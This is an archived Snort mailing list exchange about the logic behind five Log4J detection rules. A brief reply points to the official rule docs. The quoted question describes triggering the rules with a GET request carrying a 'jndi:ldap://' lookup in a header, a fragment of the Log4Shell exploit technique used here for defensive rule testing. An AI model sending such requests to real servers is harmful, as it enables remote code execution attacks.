Snort mailing list archives
Re: Additional Info on Log4J Rules
From: Joel Esler via Snort-sigs <snort-sigs () lists snort org>
Date: Mon, 14 Feb 2022 20:14:39 -0500
Those are the official docs
On Feb 14, 2022, at 6:15 PM, Chapman, Sean via Snort-sigs <snort-sigs () lists snort org> wrote: Hello all, Im looking to find out if anyone has information on the logic behind some of the Snort rules associated with Log4J detection. I can successfully trigger these rules by sending a crafted GET request with a jndi:ldap:// query in the header and then the 5 rules ( 58723 58726 58737 58742 58743 ) are triggered on the Firepower appliance and the packets are dropped but I cannot find anywhere that says WHY the packets are dropped beyond that its detecting rules for Log4J exploitation. The 5 all have the same level of detail listed such as this one https://www.snort.org/rule_docs/1-58723 <https://www.snort.org/rule_docs/1-58723> Any docs or places I missed to look for the details would be super helpful. Thanks! CONFIDENTIALITY NOTICE: The content of this message and any files transmitted with it is a confidential and proprietary business communication, which is solely for the use of the intended recipient(s). Any use, distribution, duplication or disclosure by any other person or entity is strictly prohibited. If you are not an intended recipient or this has been received in error, please notify the sender and immediately delete all copies of this communication. _______________________________________________ Snort-sigs mailing list Snort-sigs () lists snort org <mailto:Snort-sigs () lists snort org> https://lists.snort.org/mailman/listinfo/snort-sigs <https://lists.snort.org/mailman/listinfo/snort-sigs> Please visit http://blog.snort.org <http://blog.snort.org/> for the latest news about Snort! Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette <https://snort.org/faq/what-is-the-mailing-list-etiquette> Visit the Snort.org <http://snort.org/> to subscribe to the official Snort ruleset, make sure to stay up to date to catch the most <a href=" https://snort.org/downloads/#rule-downloads <https://snort.org/downloads/#rule-downloads>">emerging threats</a>!
_______________________________________________ Snort-sigs mailing list Snort-sigs () lists snort org https://lists.snort.org/mailman/listinfo/snort-sigs Please visit http://blog.snort.org for the latest news about Snort! Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette Visit the Snort.org to subscribe to the official Snort ruleset, make sure to stay up to date to catch the most <a href=" https://snort.org/downloads/#rule-downloads";>emerging threats</a>!
Current thread:
- Additional Info on Log4J Rules Chapman, Sean via Snort-sigs (Feb 14)
- Re: Additional Info on Log4J Rules Joel Esler via Snort-sigs (Feb 14)
- Re: Additional Info on Log4J Rules Chapman, Sean via Snort-sigs (Feb 16)
- Re: Additional Info on Log4J Rules Joel Esler via Snort-sigs (Feb 14)